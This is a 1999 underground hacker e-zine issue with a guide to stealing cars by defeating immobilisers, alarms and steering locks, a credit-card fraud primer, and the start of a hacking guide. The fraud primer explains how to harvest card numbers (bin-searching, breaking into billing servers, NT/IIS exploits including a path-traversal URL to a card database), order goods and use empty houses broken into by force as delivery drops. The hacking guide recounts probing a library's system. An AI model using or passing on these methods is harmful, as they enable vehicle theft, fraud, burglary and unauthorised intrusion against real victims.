Underground Periodical
"We're on the Up and Up"

:..:..::..Issue..::..:..:

Issue 4
June 1999

:.::.::.:.Staff.:.::.::.:

Cyborg - Editor
HitMan - Writer
Darkflame - Writer
CrossFire - Writer

:.::...Greetings To..::.:

fORCE
GPF#2
Zomba
ZirQaz
Rekcah
HellBent
Crypt0genic
Firestarter

:..::..:.Website.:..::..:

http://www.ecad.org/up/

:..::..:..E-mail.:..::..:

under_p@yahoo.com

:..::.:.Subscribe.:.::..:

upzine-subscribe@egroups.com

:.:.Alternative Hosts.:.:

http://www.ecad.org
http://www.swateam.org
http://www.tdshackers.com
http://www.pinnacle-creations.com

:..::..Introduction.::..:

<*> You are reading the fourth issue of Underground Periodical (like you didn't already know that, duh!). We're back again as usual, bringing you our latest in opinions and technical information. Now, anybody who has visited our website might have noticed one thing... it's not very good! There is a new opening for a place joining the staff: Webmaster. We are inviting people to apply for a position redesigning our website in whatever way they see fit. Send a sample of your work and graphics, or give us a URL to view your work, to: under_p@yahoo.com. The best page designer will be given full creative control to conjure up some HTML that proves worthy of our high standard. Remember that you will have to design the graphics as well.

<*> Well, as you might have noticed, the changeover to ecad.org is finally complete. It is an excellent website based on computer security, maintained by crypt0genic and rekcah, who have been very generous with their web space and deserve some sort of trophy for all their efforts.
If you'd like to host Underground Periodical on your website like the four alternative hosts above, get in contact with us immediately. In return we will do all we can to help increase the traffic of your site.

<*> We'd like to thank any and all people who submitted to Issue 4 or contributed in any way. Would you like to join them in flexing your writing talent and receiving our undying praise? If us staff members were to write it all on our own it would be, and let's face it, shite. Without continued support from the underground community we won't be able to keep on going. It's your magazine, so help it out a little. Anyway, on with this issue...

:..::.:..Contents.:.::..:

<*> 1 - Introduction & Contents : Cyborg
<*> 2 - Beating Car Alarms : Franco
<*> 3 - Introduction To Carding : Axcess
<*> 4 - Guide To Hacking : Mob Boss
<*> 5 - Windows Security Holes : NeonBunny
<*> 6 - Portsurfing Computers : Darkflame
<*> 7 - The Virus File : HitMan
<*> 8 - Editing The Registry : Cyborg
<*> 9 - Making Macro Virii : Tefx
<*> 10 - Elevator Beige Boxing : Holyblob
<*> 11 - Windows 98 Flaw : HitMan
<*> 12 - SMTP User Verifying : NeonBunny
<*> 13 - You've Got Mail : Readers
<*> 14 - Disclaimer & The End : Up Staff

:..::..End Of File..::..:

:..::..File 2 Of 14.::..:
:...Beating Car Alarms..:
:..::.:.By Franco.:.::..:

<*> Car alarms, immobilisers and additional locks

Can I just start by setting out the world of difference between an immobiliser and a car alarm. Yes, I'm explaining it; there are some out there that don't actually know this, so... An alarm is a device, or a series of devices, that have various guards (siren, door locks etc.) to deter or hinder the vehicle being driven away. The job of an immobiliser is to stop criminals from starting the engine and driving away. The various types are separated by the number of circuits. These circuits can be controlled breaks in electrical transmission to the engine and its components, starter motor, fuel pump etc. until it is disarmed.
This array of circuit breaks is controlled by a series of electronic relays inside the immobiliser's black box, the brain, which cuts the power. The most common setup in an immobiliser is that which comprises a transponder key fob. This is where, near the ignition, an aerial receiver is fitted; when the transponder is passed close by it automatically sends a signal which, when recognised, allows the car's engine to start. In some immobilisers the car's engine will start but the gearbox movements will be inoperative and so... no go!

(I) Immobilisers
(II) General information on immobilisers and alarms
(III) Alarms
(IV) Additional locks (steering locks, gear locks and pedal locks)

(I) IMMOBILISERS

These are a fairly new line of car protection, with the first few proper immobilisers appearing around 1992. Nothing much has changed since really; all that's been developed is the greater number of cuts available and various features which can be associated with them. I'll get on to the SMART immobilisers at the end of this section. Now, immobilisers come in many different shapes and forms and manufacturers. For instance, if your target car has a sticker with the words "Protected by Clifford systems" or "CAT" then forget about it, as these are second to none and I've never heard of a car with this security being nicked, so in all honesty you and I, yes I the master, wouldn't stand a chance! Immobilisers consist of three main parts: the brain, the power source (which can be independent of the car battery), the cuts and a siren of sorts (this is optional for some). To beat them... well, if we can, because they are SERIOUSLY HARD to beat, depends on two main factors: (a) If it's been installed DIY style and there's a mass of wires and indeed the immobiliser is visible and in easy reach, and the number of cuts to the engine. If it's DIY style then hopefully it will have been installed far away from the bulkhead and, with luck on your side, visible.
(b) If the stickers on the window say MOSS security or some low budget system then you will have better odds at beating the brain, transponder and the aerial; also many of the low budgeters use only one circuit.

Getting down to it... to un-immobilise you're gonna need one or two things:

1. your mate to keep an eye out as always.
2. wire cutters.
3. crocodile clips.
4. a bit of wire.
5. screwdrivers (assorted).
6. electrical tape.
7. 12 volt test meter.
8. some big balls and a lot of nerve.

The immobiliser that I will be trying to show how to disarm is one that operates with a transponder key fob, though there are similarities in systems that don't incorporate this feature. SEE IMMOBILISERS/ALARMS EXPLAINED ABOVE AT THE START.

METHOD NO. 1.

Now first off get into the car; once in, rip away at the underneath of the dash near the ignition. In an effort to confuse the criminal, some manufacturers only give the owner the wires in one colour (black), which, once the installer has removed the identification stickers, leaves the prospective thief to cry and walk away unless they know, and I mean know, the system well and have bundles of time. Scan the wires leading from the immobiliser to the cut points, which should be obvious as wires will have been spliced and cut and then re-joined again, and the more evident this is the better your chances of success are; one sure way of finding cut points is by looking for different wire colours merged together, or spend a bit of time with the old trusty meter. Once you've found these cut points, jam them together with tape to recreate the original circuit. ALL OF THE BREAKS MUST BE RESTORED BEFORE YOU CAN DRIVE AWAY. Then give the engine a try and... if you hear that sweet adrenaline pumping sound of an engine ticking over and running then, yes, you're set to drive away, WUPEEEEEEEE! If not... fuck that!

METHOD NO. 2.
This is where you locate the immobiliser circuits and attempt to restore the correct settings by trying to get the relays to switch over to the preferred settings. This is where it gets vague big style! What I suggest is that you attempt to do the above by means of electrical current from an external supply or, if the relays are of consequent size, switch them by hand. Or... you could beat the crap out of it with a hammer, though I don't think you'll find much success there!

<*>-----------------------------------------------------------------<*>
TIP
If you want a vehicle with little hassle then don't go near a car with an immobiliser, as working on immobilisers is a time consuming business with only a 38% chance of success (approx.). Also if the stickers on the window read the words "CAT" or "CLIFFORD" systems then walk away as they are second to none!
<*>-----------------------------------------------------------------<*>

(II) SMART IMMOBILISERS/ALARMS

The most recent, and in many cases the most expensive, incorporate various features such as auto locking doors and windows which locks them unless a specific code or device is inputted to the brain. Others include the rather drastic but very successful smoke immobilisers which can release a non-harmful gas to immobilise the thief or hinder his/her view when trying to drive away. For those who want to kill anyone who touches their car, the gases can be changed so that you die instead of being put temporarily asleep and the owner will get off scot-free! Some incorporate these, though there's a 99% chance that you'll never encounter this. Another is where the chair can be changed so that in the case of the car being stolen, if you don't input whatever into the brain, electrical elements within the chair will electrocute you until you're a sizzling mound of bone and fleshy goo, NASTY no? Another is where the car stereo can be set to blast you with whatever music to alert and draw attention to the thief.
Imagine being caught in a car blaring out BILLIE at 90 decibels; embarrassing would not be the word. In a similar instance the immobiliser can be set to either ring or page the owner or police with a preprogrammed message such as "Help help. I'm being stolen, my owner's address is ?? and my G.P.S. position is ??" Yes, someone can track your every move, which brings me on to the TRACKER. This is what's known as a quiet alarm as it doesn't always notify the thief that the car is being tracked. The tracker rings or sends out a special distress signal to the police in the area and the car's every movement is logged and watched as you drive, and once the system is engaged the police will have already hopped into their Cossie response unit and will be up your arse before you know it!

(III) ALARMS

Well, after that depressing reminder that immobilisers are hard you're gonna want to hear something nice and so... alarms are easier to beat depending on a couple of things: how many devices the alarm comprises, whether or not it has its own power supply and how well hidden it is. And so to a brief sum up of the devices incorporated in different alarms: a motion detector, door/bonnet/boot switches, timing circuits, steering movement, distance sensor, ride height and siren (all of which can be tied into the entire system). All of these devices can be nasty if the system has its own power supply independent of the engine. To the methods... (I'M GONNA POINT OUT RIGHT NOW THAT THE OBVIOUS AND QUICKEST METHOD WITH 50% TO 70% SUCCESS WILL BE EXPLAINED BUT I FEEL THAT KNOWLEDGE SHOULD BE GAINED AND THAT YOU SHOULD EDUCATE YOURSELF RATHER THAN KNOWING THE BARE ESSENTIALS!)

METHOD NO. 1.

Based on the idea that the "ALARM RUNS OFF THE CAR BATTERY", either lift the bonnet up if you can without setting the alarm off, if at all possible, or smash a window and pull the bonnet release catch inside the car. With practice your speed and confidence will increase.
Once the bonnet is up then disconnect the positive or negative terminals or both. Don't let either terminal make contact with the other when one side is connected or you could have the battery blow up in your face, not very helpful when trying not to draw attention to yourself!! Once disconnected, enter the car as you like. You have two options on trying to locate the alarm box; either are very messy. One is the rip away at the dash by the ignition approach, or wherever the alarm is disarmed from, and follow the wires back; the other way is to search the interior and engine bay frantically, and with a bit of common sense and experience you will recognise the set patterns and placement of alarms and the devices and the physiology of it all, which can and does speed up your technique. Now back to the job at hand: once you've neutralised the power source and found the alarm, the idea is to gain access to it and either short it out (which can lead to various problems explained later), or try and disarm it by making the appropriate circuits electrically. To do this it's trusty meter time with a dollop of common sense and electronic sense mixed in. Bring to a boil and, after examining the alarm's circuits, it should be obvious, or at least you will have a suspicion, of what circuits need opening and closing. And so you do this, reconnect the battery and drive away.

<*>-----------------------------------------------------------------<*>
TIP
An alarm does not stop you from driving away in the car but it does hinder your driving in that some will cause headlights and windscreen wipers etc. to function regularly and make you stand out. A car on a blazing hot dry day with wipers going from side to side and lights flickering on incessantly would attract my attention for certain!
<*>-----------------------------------------------------------------<*>

METHOD NO. 2.

Based on the premise that "THE ALARM HAS ITS OWN POWER SUPPLY" you're gonna have to work EXTRA QUICK, as undoubtedly once one of the alarm implements is violated or activated etc. the alarm's going to go off and we can't have that for too long! Now, after setting off the alarm your first priority is to disable the siren, as this brings in the most attention. Now this is where the physiology comes into play again; many people install the sirens under the bonnet with the idea that it will be heard a lot louder, and rightly so, but this is where the exploit lies. When the siren first sounds, from you opening the bonnet to looking for one or whatever, the siren, although awkwardly placed most of the time, is easy to disarm with wire cutters. The owner's misconception as to what is good positioning of the sound device is that they will in many cases believe the more awkward it was for them to drill the pilot holes and wire up and install it, the harder it is for the criminal to cut the wires or disarm it by other means. The other fault is that many people who install them will think of it being made inoperative with the use of a clumsy 7lb lump hammer or crowbar, which is hardly ever the case! With the main alarm feature disabled, you move onto other important devices which may be restricting access to indicator use etc. This can be a major problem if you need the car for something inconspicuous and low key. All that you need to do in this case is simply rewire the indicators under the dash, or wherever the alarm intersects the light circuits, to the original. If you can't do this there and then, as in most cases, just take the car to some quiet/safe spot and work on the circuits there, or you could try your hand at the alarm circuits itself.
I feel it prudent to point out the fact that if you're seen driving a car that has its lights/windscreen wipers going on and off, the police, if in the area, will pick this up straight away as it's a direct sign that a car's alarm may still be partially active and they will have seen it time and time again. Also, removing the battery from the alarm isn't always a good idea because if the current is not flowing, in some cases the circuits won't make and some vital features won't function; but with that being said, if you were to use a null battery or complete the circuit with a low power source you might get away with it. So, disabling an independently powered alarm isn't all the headache it seems.

METHOD NO. 3 (THE EASY WAY!!!!!)

This is where you open up the bonnet, if the alarm runs off the car battery, and you separate the alarm's source of power from the rest of the car's, and hey presto, the alarm stops and you're not noticed.

<*>-----------------------------------------------------------------<*>
TIP
When trying to lift up bonnets without going inside of the car, it can be a good learning experience to go to scrap yards and familiarise yourself with the movements and characteristics of different manufacturers' catches. Sounds sad to some people, but there's nothing sad about quickening your entry times etc. into cars, as a stay in prison and a criminal record sounds pretty sad to me!
<*>-----------------------------------------------------------------<*>

(IV) Steering wheel locks, gear locks and pedal locks

(1) STEERING WHEEL LOCKS

These are usually chosen by either the over cautious or those without any real form of defense for the car who are just trying to deter the opportunist. The locks come in many shapes and sizes with varying features, i.e. the colour, yellow or light yellow. The principle behind them is that, in the case of a steering lock, a bar of some strong titanium metal etc. is positioned such that the wheel cannot be turned more than one fifth turn approx.
and affects the turning circle of the car, making it impossible to drive round a 45 degree turn or greater. This is so when the bar which extends out from the lock is placed either across the wheel or dash. In the case of the dash the only way to free movement would be to cut a 360 circle around the steering column, but then again you could ask the owner to give you the keys and kiss your ass and expect more joy, not bloody likely! If it's a bar across the steering wheel then it's easier, but not much. Firstly, in most cases the lock is put on the wrong way, giving too much leeway or turn of the steering wheel; if this is the instance, you can cut away at the dash it hits, slash/move back or remove the seat which it will invariably hit, and the piece of door trim in its path. Now those are the extreme cases, if you have a lot of time to work on the car and intend on pissing the owner off and it's in a secluded spot. Here comes the sensible option: you can either use the petrol cutter approach (you need a secluded car and it makes too much noise (ENOUGH SAID)), pick the lock, or gouge away at the locking pieces of metal which form the actual lock.

(a) Picking the lock
(b) Disrupting the meeting pieces of metal which form the lock
(c) I ALREADY SAID ENOUGH!

(a) Picking the lock in many cases can be far easier, and vice versa, than performing approach (b). First off, if it is a new lock on the bar or steering wheel, i.e. it's one of those you see on a Kryptonite bicycle lock, different to normal pin tumbler style locks, then either turn to the next step or walk away. I'm not kidding, those types of locks are almost impossible to pick! If on the other hand it looks like a normal lock, pin tumbler, then... you have a chance. Pick this the way you would any other lock of its style and with a bit of luck it should open.

(b) To do this you will need a couple of tools: a couple of jimmies (crowbars), a strong screwdriver and in many cases a mate to hold and help. Got all these? Great!
Firstly examine the lock and attempt to determine whereabouts underneath the metal covering the two opposing locking metal prods are; if the cover is plastic then rip it off. The idea is that as you bend the metal covering of the steering wheel lock (in many cases part of the lock mechanism), the other piece of the lock becomes momentarily detached and has nothing opposing its movement, so that you can twist the lock apart. READ THIS AGAIN AND YOU'LL GET IT! I just want to say right here that it is POSSIBLE for this to happen, because I know someone who had it happen to him and the lock was only three years old and pretty impregnable, and they weren't exactly car thieves supreme. YES THEY WERE CAUGHT AND DEALT WITH BUT THAT'S ANOTHER STORY.

(2) PEDAL LOCKS

In this case, depending on the age and manufacturer of the lock, it will be either Kryptonite style or other. The same ideas apply as from part (b) and in some severe cases part (c). Another solution is to loosen the screws/bolts that hold the pedal concerned in place, slip it out of its locked state and replace it. This though depends if the other end of the lock is still attached to the steering wheel, which means you've still got a problem! The loosening of the pedal may also cause problems with the tension that is needed for the appropriate pulling force on the actual accelerator under the bonnet to function, and in many cases, if not all, you will find it next to impossible (without the appropriate tensioning tools) to replace, as the line will have been secured and taut with both attached etc.

(3) GEAR LOCKS

These styles of locks are rapidly going out of use and there aren't all that many variants either. Again the same conditions etc. apply for (b) and (c) in severe instances. Though there is one exploit of the common gear lock: in many cars, such as Vauxhalls, e.g.
the Vauxhall Astra mk III, the covering comes detached quite easily, and if you can manage to remove and cut away at this then you may be able to slip and slide the hook off and result in free gear movements. There is one final exploit though, if you're working on a crappy budget car, e.g. a Yugo (SHAME ON YOU. I HOPE THAT YOU'RE WORKING ON THE CAR TO BRING IT TO A SCRAPYARD OR CRUSHERS OR HOPING TO DRIVE IT OFF A CLIFF!). Anyway, the other avenue of choice is to try and locate the screws and/or bolts that hold the handbrake in place. If these are covered up by part of the lock and the metal looks too hard to bend then don't proceed. If though you can see the screws or bolts then unfasten them so the handbrake unit becomes loose; now, depending on the tension, it remains questionable if you'll be able to cut the steel wire which will in turn leave the unit free to move and, with fingers crossed, will allow the gear stick to be moved sideways and back and forth with the lock still attached. The "BIG" drawback is that you'll have no handbrake whatsoever!

<*>-----------------------------------------------------------------<*>
THE END
That's all folks... for now. If you have any questions, corrections etc. or just want to talk, you can e-mail me at crops@indigo.ie. BUB BYE...
<*>-----------------------------------------------------------------<*>

:..::..End Of File..::..:

:..::..File 3 Of 14.::..:
:Introduction To Carding:
:..::.:.By Axcess.:.::..:

<*> NOTES

It's spelt axcess with a lowercase `a'; POSIX naming conventions, thank you. RipperTM is dead, axs lives on. Thanks for your time.

<*> PREAMBLE

This file deals with the fundamentals of Credit Card Fraud. We will try to cover all subjects here, but remember this is only a primer. Credit Card Fraud is one subject where real knowledge only comes from hands on experience. It is also the debut for my WFF File ID utility, which is part of the WFF file format suite. E-mail me for more info, or request my projects file.
The line below stamps the file with an expiry, a categorisation, author, and contact address. WFF File ID is free, so get a copy off me now!

{#1byt.dbsejoh/uyuÿ9:79ÿ7hzÿ2czuBhtggwm0eqoÿ9R€jwwr}*)Jw)Rw}{xm~l}rxw)}x)Lj{mrwpÿ8\}|wzqit{ÿ13715::ÿ3qrqh#}

The official song for this article is Bedrock's Set In Stone from the Euphoria two CD set. Yeah, I always do that :).

<*> INTRODUCTION

First off, a few basic rules that should always be followed:

a) Never card for profit. This is a big no-no, as in most countries, if you get caught, the penalty is far worse than doing it for personal use (sounds like drugs, doesn't it?) :)

b) Never go over the cash limit on the card, and if you aren't sure of the cash limit, don't go over £400. This is just a precaution, but if you want to risk it, you can go up to £1000.

c) Never use a delivery address for longer than two weeks. Using it for any longer than above said is just too big a risk. I have had personal experience of this one, and it's not funny.

d) Never tell your mates, el33t hax0r dud3z, your mum, cat, dog, girlfriend, or otherwise about what you are doing. This is a classic trust no-one case. If your mum asks you where you got that lovely flat screen, make up some bullshit, but never the truth. It is advisable to stick to internal goods if buying stuff for computers.

Ok, I think we're just about ready to go on, don't you? :)

<*> STEP 1: SEEK

The process of getting the actual card numbers is almost always the most difficult part. Methods I have used successfully have included:

o CompuServe (for countries with computerised signup) E-mails (bullshite).
o Insecurities on Internet Billing Servers (recommended).
o Picking information out of company accounts (very easy, but requires the company to bring you in to do work for them first).
o Microsoft Windows NT/Transaction Server vulnerabilities (unlikely).
o Trashing (recommended).
Another method I have never been desperate enough to try is burglary; it sucks because you aren't guaranteed a reward and also the risks involved are just too high. We will discuss all of these later. First you need to know the basic information you are trying to acquire:

o Credit Card number.
o Expiry date.
o Postal address for holder.
o Postal code.
o Telephone number.

The following information would be completely valid for a transaction if it were real, i.e. all the information ever asked for is here:

Number     : 4921 1337 1337 1337
Start Date : Jan 1998
Expiry     : Dec 2005
First      : John
Last       : Dickson
Telephone  : (01222) 648223
Address 1  : 16 Longridge Court
Address 2  : Stockingstown
Address 3  : Cardiff
Postal     : CA11 2DF

Now you know what to look for, let's get explaining the techniques in acquiring the information in the first place.

CompuServe E-mails

A bit of a shitty technique which I used only once. This requires you to be in a country that allows computerised account signup (currently all, I think). Basically, sign up using fake details, although keep your name to something that sounds 'CompuServey', like "CompuServe Staff" or "Accounts Department". CompuServe's Credit Card validation system is not real-time, because of the size of the CompuServe network, so you can use fake Credit Card details that pass the standard simple validation algorithms. My favourite program for producing these numbers has to be Beazly's Number Generator, which I can give you on request, although it is available from nearly every warez kiddie's web site in the world. After signing up, the idea is simple: compose an e-mail message that sounds very formal, then post it off to random addresses on the CompuServe network. Pretty basic eh? Pretty bollocks eh?

Insecurities on Internet Billing Servers

A difficult one, but the results are always 100% accurate and detection rates are near nil if you do it right.
I won't go into much detail on this one here, as Cyborg said 4K and there are already hundreds of files on the subject. The basic technique is to find small online stores (and even sometimes big ones), then locate their billing server by submitting a dummy transaction and watching the addresses your web browser redirects between. Then, using a WinGate port scanner (one available from me), work out if the machine is an NT machine or not. If it is, see the section on Microsoft Windows NT. You can tell, because UNIXes don't usually have the NetBIOS ports (137-139) open and because if the machine is running a web service, it will report back "Microsoft IIS" or something like that if you Telnet to port 80. Using exploits, such as those found at RootShell or Fyodor's exploit world, gain access to the machine and retrieve the billing database. I told you I was going to be vague!

Picking Information Out of Company Accounts

This must be the easiest of them all, as all that is required is Administrator access (if NT based) to the accounts machine, and while the employees aren't looking, just pull up Credit Card details for customers or the company (try under Sales and Purchase Ledgers).

Microsoft Windows NT / Transaction Server Vulnerabilities

An NT based system that comes as part of Microsoft Back Office. There are two things you can do in this case, either:

a) use the example administration forms that could possibly have been foolishly left on the server, or
b) use one of the many NT server exploits available, such as one of the following popular ones:

o The Red Button Exploit (ntsecurity.net)
o The Active Server Pages hole (j.llibre@codetel.net.do)
o The IIS Slash Problems (e.g.: domain.com/..\..\acc\cc.mdb)
o Incorrectly Configured Index Servers (Rhino9's MHD).

Theft or Burglary

Pure and simple theft, pick-pocketing or otherwise. Risks are high, chances of not getting what you want are high too; avoid it like the plague.
Trashing

This is not for the faint hearted (believe me)! Try to avoid homes if trashing; instead, find businesses, where there is more paper in the bins and less nappies, tampons, rotting fruit, and dog shit.

<*> STEP 2: ORDERING

The easiest method of ordering is with a company that has a fully computerised accounts/dispatch system, as no operators are involved. I know I was asked to write this for the global community, but I haven't got a clue about most other places, so I used British examples. Good examples of fully automated dispatch systems are:

o Maplin CashTel Modem Dialup - you need an account first though, which simply requires you to place an order via telephone first. Hard.
o Next http://www.next.co.uk/

I believe the following have full automation too, although I'm not too sure:

o The Software Warehouse http://www.software-warehouse.co.uk/
o Sun Microsystems http://www.sun.com/. Rush out and get your copy of Solaris now while the offer is still on!
o Microsoft. You really need their URL? Probably - their actual Europe site is http://eu.microsoft.com/
o The Amazon http://www.amazon.com/

I wouldn't advise you try and order over the phone, it's just too suss. Another thing to note: some Internet sites and companies will call the owner of the Credit Card to confirm a redirection address.

<*> STEP 3: SAFE-HOUSE

Possibly the most important aspect of the job, the Safe House, must be perfect. If anything goes wrong with the Safe House, the whole operation is bust. Literally. Finding a Safe House is relatively hard; what you are looking for is one that is quite prominent, but at the same time quite isolated, empty, and will be empty for at least 20 days. Use any methods necessary (Trashing, bugging PCPs, etc.) to find out when the occupants will be vacating the house and when they will be back. Also try to find out where keys are stored, alarm codes, if people will be calling to check on it, etc.
Try to build up a datasheet like the following (this is the one I use):

Address   :
          :
          :
Post Code :
Telephone : (     )
Fax       :
Alarm Code:
Key Stored:
Start Date:   /   /
End Date  :   /   /
Notes     :
          :
          :

There's nothing wrong with assessing more than one house for a job. For a particular job I did a while ago, I had 3 extra houses at my disposal!

<*> STEP 4: THE DELIVERY & PICK UP

Having the goods delivered is a little step that must be done correctly, otherwise you won't have a bollock where your goods are in transit. That makes you nervous. Good carriers to use are the ones that have check-up services that allow you to find out where your goods are. Research these, then make sure you specify you want to use your own carrier when ordering. The ones I tend to use are ones with hubs as close to the Safe House as possible; I don't know why, but I always feel that it pays to be of the same locality as the driver. For instance, saying "All 'wight, mate?" to an English driver when you're from Northern Ireland always makes them give me dodgy looks, but then, that's probably just me :).

Ok now, you've got the date of arrival for your goods, and it's time to make some preparation for the arrival. If you have information on the keys to the house and the alarm codes, use it to gain entry. Make yourself at home, pull the curtains back, switch off the timers, and if you're in the mood, give the lawn a bit of a trim (joke!). Tidy the outside of the house a bit. Make sure there isn't anything obvious like notes left to the Milkman or Postman, etc. Remember, only 1 in 1000 jobs that the delivery man delivers will be fraudulent. He doesn't suspect a thing, so you shouldn't act suspicious either. Plus, he probably doesn't give a fuck if it is fraudulent or not. If you don't have any access information for the house, use some old fashioned brute force and ignorance; that's right, use your foot! Now, sit back, wait for the delivery man to come, sign for it, and run for it!
Werd-up to Xio & Backa for excelling tekneiq, Project Venona for having me, Cyborg for making me write this, Madboar for STILL owing me that beer (you know why)!, evilpinky for being a female, PC Plus for RHL 5.1, the US government for ARPANet, ARPANet for the Internet, the ISOC for the IETF, the IETF for HTTP, HTTP for all the cool stuff it's transferred to me, cool stuff for... you get the idea...

[axcess]
axs@freeuk.com
"axcess has left the building"
http://www.axs12.free-online.co.uk

:..::..End Of File..::..:

:..::..File 4 Of 14.::..:
:.:..Guide To Hacking.:.:
:..::..By Mob Boss..::..:

***********************************************************************
THE MOB BOSS' GUIDE TO HACKING
The Mob Boss
***********************************************************************

I. Introduction

Brief History of Hacking

There is no set date on which you can say hacking was born. You may mark it with the first computer system being developed or with the birth of the UNIX operating system by AT&T. One thing can be sure, hacking has been around for a long time. Maybe not in the conventional way you may think of it, but it's been around alright. I would like to start with the early 80's though. This is after the birth of UNIX, a time when people were running systems we may make fun of today. Although the hardware was primitive this was what I consider the prime days of hacking.
Long before AOL, and even before the world wide web was made for the use of the general idiots, woops I mean public. In these days information was spread through systems called BBSs, or Bulletin Board Systems. These systems offered chat, bulletin boards, and files. In these days you had more experienced hackers and phreakers (a phreaker is a phone hacker). People shared their knowledge of various computers they found, loop numbers, phone systems, and other such interesting things. If you really want to get a nostalgic point of view I suggest you read the Anarchist Cookbook. It still holds info which would help you today, but most of the texts, the original ones, date back to the eighties and were actually distributed on BBSs.

Back in these days there were only two ways to access systems remotely. One is through telenet, a network of computers from around the world with dialups in most major cities. The other way is a personal favorite of mine, wardialing. This is the process of dialing every phone number in an exchange (the first three digits of your seven digit phone number) looking for computer carriers. There are many things found while wardialing besides computers as well. Loop numbers (very rare these days), PBXs, test numbers, fax machines, and other interesting numbers can all be found by simply picking up your phone or having your wardialer do it for you. My personal favorite for wardialers is the DOS based TONELOC available throughout the web. Now wardialing is just plain fun for me these days, but back in yesteryear that was the only way to hack. The interesting computer numbers were also traded among the people on the BBSs. Although I wasn't there for the grand old days of hacking I have first hand accounts from friends who were, and from texts I have read. One article that really shows how much fun those days were was a series of articles called Diary of a Hacker.
These things were not as uncommon as you would think; I personally know someone who I met off the net who was a sysop on a BBS in those days. If you are new though, keep in mind hacking has changed a lot since those days.

What is Hacking?

This question is one that I have thought about and have been asked about many times. My definition of a hacker is someone who is very knowledgeable of various computer systems and how to work them in ways your every day user is ignorant of. A hacker is someone who pushes a system beyond its limits. This is a person who knows what's what and is ethical in his work as well. If you are new and haven't read an article on ethics then I suggest you do so. My article on ethics is available on my website at ( http://mobboss.dragx.cx ). Finally, a hacker is someone who uses the computer knowledge he has to gain even more knowledge.

What hacking isn't

This is where we separate the smart hackers of the future from the faggots. I know Hollywood and the media may have given you some ideas about hacking that you may have liked. For the most part everything in the movies and on television is complete bullshit. Forget everything you saw in Hackers, Goldeneye, and Mission Impossible. These are all bullshit exaggerations, although the evil hacker, Boris in Goldeneye, was pretty cool. Hacking isn't about stealing yourself shit, it's not about taking revenge, and it is most certainly not about looking cool. God only knows you look like shit after spending a weekend behind the old terminal trying to access a certain server. Also, no matter what your queer friends at school have said, using a trojan horse to access a windows system is just plain pointless. If you do it, don't brag about it and don't spend too much time with it, since it is nothing but a waste of valuable time. If you are still interested then continue reading.

Hacking as of April, 1999

Just to clue you new guys into what's going on in the hacking community these days.
Most of your hacking and phreaking info is all on the web. There are still a few BBSs left, some even with telnet access on the web to save on that long distance bill. Usenet has become a wasteland of flaming for the most part, although you still find some knowledgeable people among the ridiculous posts that come around. Web based chat such as AOL, Yahoo, and anything else like it has no knowledgeable hackers, take my word for it. You will find nothing but big talking idiots there. Most systems aren't as weak as they used to be. So forget logging into remote computers without a password or as root:root like you may have read in an old article. Even techniques from the early nineties are no good these days, one being the PHF exploit. Also it is impossible to find an unshadowed password file these days, so forget about it. Hacking is as hard as it ever was, so don't get any false ideas of glory.

II. First Steps

The Library

Believe it or not, the library is most likely the best place to start your hacking career. Although they may appear useless, these can be one of your best friends. Your local library carries a wealth of information for the aspiring hacker or phreaker. First off, among the many shitty books there are many computer books on subjects ranging from various Operating Systems to telecommunications info. I suggest you take out some books on DOS, UNIX, and Windows 95/98/NT. Also I suggest you learn about TCP/IP and networking. Read as much as you can. Also at the library you will find many interesting directories such as the Haines Criss Cross Directory which lists phone numbers by addresses and numbers by names and all those vice versa. You may also decide to use the computers at the library for either anonymity while hacking or just for the pure pleasure of messing around with a LAN.

Search Engines

Now some of you brighter ones already know this, but for the mentally less fortunate I will go over the wonderful powers of the almighty search engine.
After looking in the library for books on hacking you most likely turned up nothing; that's why I didn't say to look that up. To find hacking info we head for the net. Now my personal favorite is www.altavista.com, I find that to have the most complete listing among all of the ones you see these days. Some things you wanna look up are hacking, phreaking, hacking texts, and computer security. Among these topics you will find good information and other things that are complete garbage. Just sort through that info and pick what you are most interested in. I do suggest though you don't bother with proggies. They are usually nothing more than a waste of time. The good stuff will come in the form of text files. Read everything you can get your hands on.

IRC

Now IRC can be fun or it can be dumb, it's what you make out of it. If you go on there occasionally to ask a couple questions, share some info, or to just hang out for a bit while you're bored, everything is fine. If you go on there all the time just to argue, you're wasting your valuable time. Your best bet is to stay relatively impartial. Why bother with flame wars that end up with nothing but wasted time that could have been better spent. Most people on there are bored and have nothing better to do than bother other people, so before you sink to their level just think about that.

USENET

USENET has become a little worse in the past few years. It has a lot of spam and a lot of dumb posts. Though once in a while you will see some intelligent Q & A; it's refreshing to see a break from the usual garbage once in a while. Now if you use newsgroups correctly this is a good way to get a question answered within a day or two. It's all about not asking the wrong question. Read the group's FAQs before posting and in all questions related to hacking stay away from AOL, Hotmail, and "How do I hack?" questions. These will just result in some flaming, that's it.
Fitting In

This can be easy or this can be hard, it all depends on your personality. Some people just have a way about them that will piss off anyone. First thing is not to act like a newbie; attaching "I am a newbie" to each question is dumb. That's not to say though you should act like you know more than you do either. There is a thin line you should walk. Also, like I mentioned before, there are some questions that should not be asked. Questions asking for someone to teach you to hack? Also questions about Hotmail and AOL are looked down upon as well. Not to mention people feel anyone who pays the high fees AOL charges for shitty service is a complete moron, so if you are using AOL expect some teasing for using that. Another thing, many hackers don't like Windows and will laugh at you for running it. I feel both Linux and Windows come in handy, so I always have some sort of Linux access along with my Windows computer. I really suggest though you watch the conversations wherever you're chatting or posting to get a sense of what is going on. Above all, try not to piss off anyone.

III. Getting Started

How do I find good boxes to mess with?

Well, when you talk to some people this seems to be the biggest problem. I personally never found it a problem, but I figured I should include this for those who do have trouble with it. Interesting computers, as well as phones for those aspiring phreaks, can come from everyday life. You may notice a local business is online and wonder about what the system is and what it does. When you're out and about keep your eyes open for things that may pose interesting. For instance, while checking out some good UNIX books (which by now I hope you all have done) I took it upon myself to sit down at one of their computers and mess around trying to get a non-internet computer to get on so I could check my mail. In the process a nasty librarian came over to me and reprimanded me.
I of course played innocent, but when I got home I said to myself "Wonder what these people are holding on to so tightly". So I fired up my computer, headed for the internet, found their website, then looked at the IP address their card catalog was on, and from there found a nice old UNIX V system, which surprised me since all their user computers are running Windows 95. In the end, although I did not mess with it too seriously, I found it allowed routing mail, which meant I could forge mail from them, not to mention it was a good server which did not show my IP in the header.

